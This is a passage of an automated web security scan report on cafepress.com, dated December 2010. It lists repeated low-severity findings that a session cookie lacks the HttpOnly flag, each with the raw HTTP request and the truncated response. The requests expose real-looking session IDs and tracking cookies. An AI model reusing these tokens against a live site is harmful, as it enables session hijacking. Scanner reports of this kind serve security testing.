The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cp/viewcart.aspx HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 51119 Date: Sun, 26 Dec 2010 13:44:52 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:44:52 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Content-Length: 51119 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.57. http://www.cafepress.com/make/birth-announcements
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/birth-announcements
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/birth-announcements HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 54454 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54454 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.58. http://www.cafepress.com/make/custom-baby-gear
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-baby-gear
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-baby-gear HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 71150 Date: Sun, 26 Dec 2010 13:48:09 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71150 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.59. http://www.cafepress.com/make/custom-buttons
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-buttons
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 54710 Date: Sun, 26 Dec 2010 13:47:58 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54710 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.60. http://www.cafepress.com/make/custom-hats
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-hats
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-hats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 54657 Date: Sun, 26 Dec 2010 13:48:07 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54657 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.61. http://www.cafepress.com/make/custom-hoodies-sweatshirts
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-hoodies-sweatshirts
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-hoodies-sweatshirts HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 69583 Date: Sun, 26 Dec 2010 13:47:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 69583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.62. http://www.cafepress.com/make/custom-ipad-case
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/custom-ipad-case
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/custom-ipad-case HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
